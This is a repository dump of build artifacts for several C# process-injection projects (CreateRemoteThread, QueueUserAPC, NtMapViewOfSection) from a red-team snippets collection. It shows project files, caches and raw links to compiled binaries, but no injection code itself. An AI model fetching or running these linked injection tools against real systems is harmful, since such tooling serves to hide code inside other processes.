https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "additionalProbingPaths": [ 4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|", 5 | "C:\\Users\\0xtriboulet\\.nuget\\packages" 6 | ] 7 | } 8 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "tfm": "netcoreapp3.1", 4 | "framework": { 5 | "name": "Microsoft.NETCore.App", 6 | "version": "3.1.0" 7 | } 8 | } 9 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080 2 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig: -------------------------------------------------------------------------------- 1 | is_global = true 2 | build_property.RootNamespace = ConsoleApp1 3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\ProcessInjection_CreateRemoteThread\ConsoleApp1\ConsoleApp1\ 4 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 2daac1f55b0f9263d04ca399f0ab1f7cfe7a4d3e 2 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | 3914a16dc66868dc2364d6ffe4a1fc74b6920dcb 2 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": "69n3ZJsUquHc4sOxi/CNchuohQhlJ+YJdDUezVnncW81sNReBiw65j6wg0uOTtyKpJLp0yACMx37kyAUhkLhiw==", 4 | "success": true, 5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\ProcessInjection_CreateRemoteThread\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj", 6 | "expectedPackageFiles": [], 7 | "logs": [] 8 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | netcoreapp3.1 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeTarget": { 3 | "name": ".NETCoreApp,Version=v3.1", 4 | "signature": "" 5 | }, 6 | "compilationOptions": {}, 7 | "targets": { 8 | ".NETCoreApp,Version=v3.1": { 9 | "ConsoleApp1/1.0.0": { 10 | "runtime": { 11 | "ConsoleApp1.dll": {} 12 | } 13 | } 14 | } 15 | }, 16 | "libraries": { 17 | "ConsoleApp1/1.0.0": { 18 | "type": "project", 19 | "serviceable": false, 20 | "sha512": "" 21 | } 22 | } 23 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "additionalProbingPaths": [ 4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|", 5 | "C:\\Users\\0xtriboulet\\.nuget\\packages" 6 | ] 7 | } 8 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "tfm": "netcoreapp3.1", 4 | "framework": { 5 | "name": "Microsoft.NETCore.App", 6 | "version": "3.1.0" 7 | } 8 | } 9 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080 2 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig: -------------------------------------------------------------------------------- 1 | is_global = true 2 | build_property.RootNamespace = ConsoleApp1 3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\ProcessInjection_CreateThread\ConsoleApp1\ConsoleApp1\ 4 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 2daac1f55b0f9263d04ca399f0ab1f7cfe7a4d3e 2 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | e744f908d881bf42cab133eb47ad3549e1832016 2 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": "T5DCfvOqD/FmHEOz/I1KvKlgHbnKKs7Ont7s1fKDrylAu8i7pL5K61si8oGNungJMlNsJZEq9ejv5J+oBIPQDA==", 4 | "success": true, 5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\ProcessInjection_CreateThread\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj", 6 | "expectedPackageFiles": [], 7 | "logs": [] 8 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | netcoreapp3.1 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeTarget": { 3 | "name": ".NETCoreApp,Version=v3.1", 4 | "signature": "" 5 | }, 6 | "compilationOptions": {}, 7 | "targets": { 8 | ".NETCoreApp,Version=v3.1": { 9 | "ConsoleApp1/1.0.0": { 10 | "runtime": { 11 | "ConsoleApp1.dll": {} 12 | } 13 | } 14 | } 15 | }, 16 | "libraries": { 17 | "ConsoleApp1/1.0.0": { 18 | "type": "project", 19 | "serviceable": false, 20 | "sha512": "" 21 | } 22 | } 23 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "additionalProbingPaths": [ 4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|", 5 | "C:\\Users\\0xtriboulet\\.nuget\\packages" 6 | ] 7 | } 8 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "tfm": "netcoreapp3.1", 4 | "framework": { 5 | "name": "Microsoft.NETCore.App", 6 | "version": "3.1.0" 7 | } 8 | } 9 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080 2 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig: -------------------------------------------------------------------------------- 1 | is_global = true 2 | build_property.RootNamespace = ConsoleApp1 3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\ProcessInjection_NtMapViewOfSection\ConsoleApp1\ConsoleApp1\ 4 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 2daac1f55b0f9263d04ca399f0ab1f7cfe7a4d3e 2 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | dbc5f2d2dde9ded4efa7a46af73bce5b7462ad86 2 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": "totIWlSrHR+s/eXPcnyaBqwVDT6uhdqNbTAl6ILr+g9i1VvqoIiI4ARBQFdwMuVgV3J/+vWZjp4rro2G2E4mfQ==", 4 | "success": true, 5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\ProcessInjection_NtMapViewOfSection\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj", 6 | "expectedPackageFiles": [], 7 | "logs": [] 8 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | netcoreapp3.1 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeTarget": { 3 | "name": ".NETCoreApp,Version=v3.1", 4 | "signature": "" 5 | }, 6 | "compilationOptions": {}, 7 | "targets": { 8 | ".NETCoreApp,Version=v3.1": { 9 | "ConsoleApp1/1.0.0": { 10 | "runtime": { 11 | "ConsoleApp1.dll": {} 12 | } 13 | } 14 | } 15 | }, 16 | "libraries": { 17 | "ConsoleApp1/1.0.0": { 18 | "type": "project", 19 | "serviceable": false, 20 | "sha512": "" 21 | } 22 | } 23 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "additionalProbingPaths": [ 4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|", 5 | "C:\\Users\\0xtriboulet\\.nuget\\packages" 6 | ] 7 | } 8 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "tfm": "netcoreapp3.1", 4 | "framework": { 5 | "name": "Microsoft.NETCore.App", 6 | "version": "3.1.0" 7 | } 8 | } 9 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080 2 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig: -------------------------------------------------------------------------------- 1 | is_global = true 2 | build_property.RootNamespace = ConsoleApp1 3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\ProcessInjection_QueueUserAPC\ConsoleApp1\ConsoleApp1\ 4 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 2daac1f55b0f9263d04ca399f0ab1f7cfe7a4d3e 2 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | a20789d862bd7d7720a906d34c758f8b54de7636 2 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": "UgH6OIScwCTMo75t+Bb7MMmzMHyfpbovZJg01aBN5tOWC/vBgW/Xz9BZIfIFjdEDlr0+3rj0VELTK64tWo6i3Q==", 4 | "success": true, 5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\ProcessInjection_QueueUserAPC\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj", 6 | "expectedPackageFiles": [], 7 | "logs": [] 8 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /C#/Readme.md: -------------------------------------------------------------------------------- 1 | A lot of this code is based on/borrowed from course work from CRTO/CRTO II by ZeroPoint Security (ZPS). 2 | 3 | For more information on the course(s) check out some ZPS courses: 4 | https://training.zeropointsecurity.co.uk/collections 5 | -------------------------------------------------------------------------------- /C/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | 